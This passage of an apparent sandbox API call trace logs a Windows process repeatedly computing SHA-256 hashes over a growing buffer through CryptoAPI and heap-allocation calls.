	[0154.805] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23067a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23067a8, pdwDataLen=0x128aac) returned 1
	[0154.805] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.805] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.805] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.806] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.806] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0154.806] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23067d0
	[0154.806] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23067d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23067d0, pdwDataLen=0x128aac) returned 1
	[0154.806] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.806] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.806] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.807] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.807] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0154.807] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23067f8
	[0154.807] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23067f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23067f8, pdwDataLen=0x128aac) returned 1
	[0154.807] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.807] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.807] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.807] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.807] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0154.807] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306820
	[0154.807] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306820, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306820, pdwDataLen=0x128aac) returned 1
	[0154.807] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.808] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.808] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.808] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.808] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0154.808] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306848
	[0154.808] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306848, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306848, pdwDataLen=0x128aac) returned 1
	[0154.808] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.808] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.808] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.809] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.809] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0154.809] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.809] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306870
	[0154.809] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306870, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306870, pdwDataLen=0x128aac) returned 1
	[0154.809] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.809] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.809] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.810] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.810] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0154.810] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306898
	[0154.810] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306898, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306898, pdwDataLen=0x128aac) returned 1
	[0154.810] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.810] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.810] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.810] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.811] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0154.811] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23068c0
	[0154.811] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23068c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23068c0, pdwDataLen=0x128aac) returned 1
	[0154.811] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.811] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.811] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.811] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.811] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0154.811] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23068e8
	[0154.811] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23068e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23068e8, pdwDataLen=0x128aac) returned 1
	[0154.811] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.811] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.811] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.812] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.812] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0154.812] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306910
	[0154.812] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306910, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306910, pdwDataLen=0x128aac) returned 1
	[0154.812] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.812] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.812] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.812] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.812] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0154.812] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306938
	[0154.812] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306938, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306938, pdwDataLen=0x128aac) returned 1
	[0154.812] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.812] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.812] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.813] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.813] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0154.813] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306960
	[0154.813] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306960, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306960, pdwDataLen=0x128aac) returned 1
	[0154.813] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.813] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.813] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.813] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.813] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0154.813] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306988
	[0154.813] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306988, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306988, pdwDataLen=0x128aac) returned 1
	[0154.813] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.813] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.813] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.814] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.814] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0154.814] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23069b0
	[0154.814] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23069b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23069b0, pdwDataLen=0x128aac) returned 1
	[0154.814] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.814] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.814] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.814] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.814] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0154.814] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23069d8
	[0154.814] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23069d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23069d8, pdwDataLen=0x128aac) returned 1
	[0154.814] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.814] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.814] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.815] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.815] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0154.815] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306a00
	[0154.815] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306a00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306a00, pdwDataLen=0x128aac) returned 1
	[0154.815] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.815] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.815] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.815] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.815] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0154.815] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306a28
	[0154.815] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306a28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306a28, pdwDataLen=0x128aac) returned 1
	[0154.815] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.815] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.815] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.816] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.816] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0154.816] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306a50
	[0154.816] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306a50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306a50, pdwDataLen=0x128aac) returned 1
	[0154.816] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.816] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.816] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.816] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.816] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0154.816] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306a78
	[0154.817] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306a78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306a78, pdwDataLen=0x128aac) returned 1
	[0154.817] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.817] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.817] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.817] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.817] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0154.817] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306aa0
	[0154.817] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306aa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306aa0, pdwDataLen=0x128aac) returned 1
	[0154.817] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.817] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.817] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.818] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.818] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0154.818] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306ac8
	[0154.818] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306ac8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306ac8, pdwDataLen=0x128aac) returned 1
	[0154.818] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.818] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.818] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.818] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.818] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0154.818] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306af0
	[0154.818] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306af0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306af0, pdwDataLen=0x128aac) returned 1
	[0154.818] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.818] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.818] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.819] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.819] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0154.819] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.819] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306b18
	[0154.819] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306b18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306b18, pdwDataLen=0x128aac) returned 1
	[0154.819] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.819] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.819] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.819] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.819] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0154.819] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306b40
	[0154.820] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306b40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306b40, pdwDataLen=0x128aac) returned 1
	[0154.820] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.820] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.820] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.820] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.820] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0154.820] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306b68
	[0154.820] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306b68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306b68, pdwDataLen=0x128aac) returned 1
	[0154.820] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.820] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.820] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.821] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.821] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0154.821] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.821] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306b90
	[0154.821] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306b90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306b90, pdwDataLen=0x128aac) returned 1
	[0154.821] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.821] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
